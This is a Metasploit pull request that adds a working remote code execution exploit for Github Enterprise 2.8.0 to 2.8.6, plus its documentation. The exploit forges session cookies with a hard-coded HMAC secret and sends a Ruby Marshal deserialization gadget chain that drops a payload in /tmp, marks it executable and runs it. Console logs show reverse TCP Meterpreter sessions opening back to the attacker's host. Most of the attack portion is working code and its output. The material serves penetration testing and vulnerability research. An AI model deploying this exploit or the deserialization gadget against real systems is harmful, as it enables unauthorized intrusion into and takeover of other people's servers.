### PR TITLE
Add Default Secret & Deserialization Exploit for Github Enterprise

### DIFF
--- a/documentation/modules/exploit/linux/http/github_enterprise_secret.md
+++ b/documentation/modules/exploit/linux/http/github_enterprise_secret.md
@@ -1,0 +1,61 @@
+This module exploits two security issues found in Github Enterprise 2. The first problem is
+that the session management uses a hard-coded secret value, which can be abused to sign a
+serialized malicious object. The second problem is that the serialized string is passed to
+a ```Marshal.load``` API call, which deserializes the malicious object, and executes it. A
+malicious attacker can take advantage of these problems to achieve remote code execution.
+
+## Vulnerable Application
+
+For testing purposes, you can download a Github Enterprise image from the following location:
+
+[https://enterprise.github.com/releases/](https://enterprise.github.com/releases/)
+
+This module was specifically tested against version 2.8.0, which can be downloaded here:
+
+[https://github-enterprise.s3.amazonaws.com/esx/releases/github-enterprise-2.8.0.ova](https://github-enterprise.s3.amazonaws.com/esx/releases/github-enterprise-2.8.0.ova)
+
+Before you install the image, you must have a valid key. Start from here:
+
+[https://enterprise.github.com/sn-trial](https://enterprise.github.com/sn-trial)
+
+After signing up for a trial, you should receive an e-mail. The email will instruct you to access
+your portal account. In there, you can download your github-enterprise.ghl file, which is a key
+to complete installing your Github Enterprise system.
+
+## Using github_enterprise_secret
+
+The module consists of two features: the ```check``` command and the ```exploit``` command.
+
+The ```check``` command determines if the host is vulnerable or not by extracting the hash of the
+cookie, and then attempts to create the same hash using the default secret key. If the two match,
+it means the module can tamper the cookie, and that makes the server vulnerable to deserialization.
+
+```
+msf exploit(github_enterprise_secret) > check
+
+[*] Found cookie value: _gh_manage=BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiRTViZTAwNjg4NDViYmYzNWQzMGZl%0AZTRiYWY2YmU4Mzg2MzQ2NjFjODcxYTAyZDZlZjA0YTQ2MWIzNDBiY2VkMGIG%0AOwBGSSIPY3NyZi50b2tlbgY7AFRJIjFZZ0I5ckVkbWhwclpmNWF5RmVia3Zv%0AQzVKMUVoVUxlRWNEbjRYbHplb2R3PQY7AEY%3D%0A--ab0866fc61ea036b1e83cd65b92c2b6cc5b001ed;, checking to see if it can be tampered...
+[*] Data: BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiRTViZTAwNjg4NDViYmYzNWQzMGZlZTRiYWY2YmU4Mzg2MzQ2NjFjODcxYTAyZDZlZjA0YTQ2MWIzNDBiY2VkMGIGOwBGSSIPY3NyZi50b2tlbgY7AFRJIjFZZ0I5ckVkbWhwclpmNWF5RmVia3ZvQzVKMUVoVUxlRWNEbjRYbHplb2R3PQY7AEY=
+[*] Extracted HMAC: ab0866fc61ea036b1e83cd65b92c2b6cc5b001ed
+[*] Expected HMAC: ab0866fc61ea036b1e83cd65b92c2b6cc5b001ed
+[*] The HMACs match, which means you can sign and tamper the cookie.
+[+] 192.168.146.201:8443 The target is vulnerable.
+msf exploit(github_enterprise_secret) > 
+```
+
+If vulnerable, the ```exploit``` command will attempt to gain access of the system:
+
+```
+msf exploit(github_enterprise_secret) > exploit
+
+[*] Started reverse TCP handler on 192.168.146.1:4444 
+[*] Serialized Ruby stager
+[*] Sending serialized Ruby stager...
+[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
+[*] Sending stage (1495599 bytes) to 192.168.146.201
+[*] Meterpreter session 2 opened (192.168.146.1:4444 -> 192.168.146.201:52454) at 2017-03-23 10:11:17 -0500
+[+] Deleted /tmp/htBDuK.bin
+[+] Deleted /tmp/kXgpK.bin
+[*] Connection timed out
+
+meterpreter >
+```

--- a/documentation/modules/exploit/linux/http/github_enterprise_secret.md
+++ b/documentation/modules/exploit/linux/http/github_enterprise_secret.md
@@ -4,6 +4,9 @@ serialized malicious object. The second problem is that the serialized string is
 a ```Marshal.load``` API call, which deserializes the malicious object, and executes it. A
 malicious attacker can take advantage of these problems to achieve remote code execution.
 
+According to exablue.de, this RCE was reported to GitHub, and the researcher was rewarded
+$18,000 total.
+
 ## Vulnerable Application
 
 For testing purposes, you can download a Github Enterprise image from the following location:

--- a/documentation/modules/exploit/linux/http/github_enterprise_secret.md
+++ b/documentation/modules/exploit/linux/http/github_enterprise_secret.md
@@ -9,6 +9,10 @@ $18,000 total.
 
 ## Vulnerable Application
 
+The following versions are affected:
+
+* 2.8.0 - 2.8.6.
+
 For testing purposes, you can download a Github Enterprise image from the following location:
 
 [https://enterprise.github.com/releases/](https://enterprise.github.com/releases/)

--- a/modules/exploits/linux/http/github_enterprise_secret.rb
+++ b/modules/exploits/linux/http/github_enterprise_secret.rb
@@ -114,6 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def serialize
     # We don't want to run this code within the context of Framework, so we run it as an
     # external process.
+    # Brilliant trick from Brent and Adam to overcome the issue.
     ruby_code = %Q|
     module Erubis;class Eruby;end;end
     module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end

--- a/modules/exploits/linux/http/github_enterprise_secret.rb
+++ b/modules/exploits/linux/http/github_enterprise_secret.rb
@@ -16,11 +16,11 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "Github Enterprise Default Session Secret And Deserialization Vulnerability",
       'Description'    => %q{
-        This module exploits two security issues in Github Enterprise, version 2.8. The first is
-        that the session management uses a hard-coded secret value, which can be abused to sign
-        a serialized malicious Ruby object. The second problem is due to the use of unsafe
-        deserialization, which allows the malicious Ruby object to be loaded, and results
-        in arbitrary remote code execution.
+        This module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6.
+        The first is that the session management uses a hard-coded secret value, which can be
+        abused to sign a serialized malicious Ruby object. The second problem is due to the
+        use of unsafe deserialization, which allows the malicious Ruby object to be loaded,
+        and results in arbitrary remote code execution.
 
         This exploit was tested against version 2.8.0.
       },
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'EDB', '41616' ],
-          [ 'URL', 'http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html' ]
+          [ 'URL', 'http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html' ],
+          [ 'URL', 'https://enterprise.github.com/releases/2.8.7/notes' ] # Patched in this version
         ],
       'Platform'       => 'linux',
       'Targets'        =>

--- a/modules/exploits/linux/http/github_enterprise_secret.rb
+++ b/modules/exploits/linux/http/github_enterprise_secret.rb
@@ -143,20 +143,6 @@ class MetasploitModule < Msf::Exploit::Remote
     return serialized_object, hmac
   end
 
-  def get_rce_status(res)
-    unless res
-      return 'Connection timed out'
-    end
-
-    msg = "Server returned with: #{res.code}"
-
-    if res.code == 302
-      msg << ' (looks like successful code execution)'
-    end
-
-    msg
-  end
-
   def send_serialized_data(dump, hmac)
     uri = normalize_uri(target_uri.path)
     gh_manage_value = CGI.escape("#{dump}--#{hmac}")
@@ -167,7 +153,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'cookie' => cookie
     })
 
-    print_status(get_rce_status(res))
+    if res
+      print_status("Server returned: #{res.code}")
+    end
   end
 
   def exploit

--- a/modules/exploits/linux/http/github_enterprise_secret.rb
+++ b/modules/exploits/linux/http/github_enterprise_secret.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
         This module exploits two security issues in Github Enterprise, version 2.8. The first is
         that the session management uses a hard-coded secret value, which can be abused to sign
         a serialized malicious Ruby object. The second problem is due to the use of unsafe
-        deserialization, which can allows the malicious Ruby object to be loaded, and results
+        deserialization, which allows the malicious Ruby object to be loaded, and results
         in arbitrary remote code execution.
 
         This exploit was tested against version 2.8.0.

--- a/modules/exploits/linux/http/github_enterprise_secret.rb
+++ b/modules/exploits/linux/http/github_enterprise_secret.rb
@@ -1,0 +1,205 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Github Enterprise Default Session Secret And Deserialization Vulnerability",
+      'Description'    => %q{
+        This module exploits two security issues in Github Enterprise, version 2.8. The first is
+        that the session management uses a hard-coded secret value, which can be abused to sign
+        a serialized malicious Ruby object. The second problem is due to the use of unsafe
+        deserialization, which can allows the malicious Ruby object to be loaded, and results
+        in arbitrary remote code execution.
+
+        This exploit was tested against version 2.8.0.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'iblue <iblue[at]exablue.de>', # Original discovery, writeup, and PoC (he did it all!)
+          'sinn3r'                       # Porting the PoC to Metasploit
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '41616' ],
+          [ 'URL', 'http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html' ]
+        ],
+      'Platform'       => 'linux',
+      'Targets'        =>
+        [
+          [ 'Github Enterprise 2.8', { } ]
+        ],
+      'DefaultOptions' =>
+        {
+          'SSL'   => true,
+          'RPORT' => 8443
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => 'Mar 15 2017',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Github Enterprise', '/'])
+      ], self.class)
+  end
+
+  def secret
+    '641dd6454584ddabfed6342cc66281fb'
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path, 'setup', 'unlock')
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri'    => uri,
+      'vars_get' =>{
+        'redirect_to' => '/'
+      }
+    })
+
+    unless res
+      vprint_error('Connection timed out.')
+      return Exploit::CheckCode::Unknown
+    end
+
+    unless res.get_cookies.match(/^_gh_manage/)
+      vprint_error('No _gh_manage value in cookie found')
+      return Exploit::CheckCode::Safe
+    end
+
+    cookies = res.get_cookies
+    vprint_status("Found cookie value: #{cookies}, checking to see if it can be tampered...")
+    gh_manage_value = CGI.unescape(cookies.scan(/_gh_manage=(.+)/).flatten.first)
+    data = gh_manage_value.split('--').first
+    hmac = gh_manage_value.split('--').last.split(';', 2).first
+    vprint_status("Data: #{data.gsub(/\n/, '')}")
+    vprint_status("Extracted HMAC: #{hmac}")
+    expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
+    vprint_status("Expected HMAC: #{expected_hmac}")
+
+    if expected_hmac == hmac
+      vprint_status("The HMACs match, which means you can sign and tamper the cookie.")
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def get_ruby_code
+    b64_fname = "/tmp/#{Rex::Text.rand_text_alpha(6)}.bin"
+    bin_fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}.bin"
+    register_file_for_cleanup(b64_fname, bin_fname)
+    p = Rex::Text.encode_base64(generate_payload_exe)
+
+    c  = "File.open('#{b64_fname}', 'wb') { |f| f.write('#{p}') }; "
+    c << "%x(base64 --decode #{b64_fname} > #{bin_fname}); "
+    c << "%x(chmod +x #{bin_fname}); "
+    c << "%x(#{bin_fname})"
+    c
+  end
+
+
+  def serialize
+    # We don't want to run this code within the context of Framework, so we run it as an
+    # external process.
+    ruby_code = %Q|
+    module Erubis;class Eruby;end;end
+    module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
+
+    erubis = Erubis::Eruby.allocate
+    erubis.instance_variable_set :@src, \\"#{get_ruby_code}; 1\\"
+    proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
+    proxy.instance_variable_set :@instance, erubis
+    proxy.instance_variable_set :@method, :result
+    proxy.instance_variable_set :@var, "@result"
+
+    session =
+    {
+      'session_id' => '',
+      'exploit'    => proxy
+    }
+
+    print Marshal.dump(session)
+    |
+
+    serialized_output = `ruby -e "#{ruby_code}"`
+
+    serialized_object = [serialized_output].pack('m')
+    hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, serialized_object)
+
+    return serialized_object, hmac
+  end
+
+  def get_rce_status(res)
+    unless res
+      return 'Connection timed out'
+    end
+
+    msg = "Server returned with: #{res.code}"
+
+    if res.code == 302
+      msg << ' (looks like successful code execution)'
+    end
+
+    msg
+  end
+
+  def send_serialized_data(dump, hmac)
+    uri = normalize_uri(target_uri.path)
+    gh_manage_value = CGI.escape("#{dump}--#{hmac}")
+    cookie = "_gh_manage=#{gh_manage_value}"
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri,
+      'cookie' => cookie
+    })
+
+    print_status(get_rce_status(res))
+  end
+
+  def exploit
+    dump, hmac = serialize
+    print_status('Serialized Ruby stager')
+
+    print_status('Sending serialized Ruby stager...')
+    send_serialized_data(dump, hmac)
+  end
+
+end
+
+=begin
+
+Handy information:
+
+To deobfuscate Github code, use this script:
+https://gist.github.com/wchen-r7/003bef511074b8bc8432e82bfbe0dd42
+
+Github Enterprise's Rack::Session::Cookie saves the session data into a cookie using this
+algorithm:
+
+* Takes the session hash (Json) in env['rack.session']
+* Marshal.dump the hash into a string
+* Base64 the string
+* Append a hash of the data at the end of the string to prevent tampering.
+* The signed data is saved in _gh_manage'
+
+The format looks like this:
+
+[ DATA ]--[ Hash ]
+
+Also see:
+https://github.com/rack/rack/blob/master/lib/rack/session/cookie.rb
+
+=end


### PR DESCRIPTION
## Description

This module exploits two issues in Github Enterprise. The first issue is that Github Enterprise uses a default secret to sign serialized data. The second issue is that since the secret is known, an attacker can embed a malicious Ruby object in the serialized data, which results in remote code execution when deserialized By Github Enterprise.

Special thanks to @bcook-r7 & @acammack-r7 for the namespace issue.

## Vulnerable Server Setup

- [x] Download https://github-enterprise.s3.amazonaws.com/esx/releases/github-enterprise-2.8.0.ova
- [x] Go to https://enterprise.github.com/sn-trial and sign up for a trial.
- [x] After signing up for a trial, you will get an email to access a portal. In the portal, you will get a key file. The file is used to install/set up Github Enterprise.

## Verification

- [x] Start msfconsole
- [x] `use exploit/linux/http/github_enterprise_secret`
- [x] ```set RHOST [IP]```
- [x] ```set PAYLOAD linux/x86/meterpreter/reverse_tcp```
- [x] ```set LHOST [IP]```
- [x] ```check```
- [x] The check command should say the host is vulnerable
- [x] ```exploit```
- [x] You should obtain a Meterpreter session

## Demo

```
msf exploit(github_enterprise_secret) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Serialized Ruby stager
[*] Sending serialized Ruby stager...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 192.168.146.201
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.201:60827) at 2017-03-23 10:42:45 -0500
[+] Deleted /tmp/VhZraH.bin
[+] Deleted /tmp/PyPJN.bin
```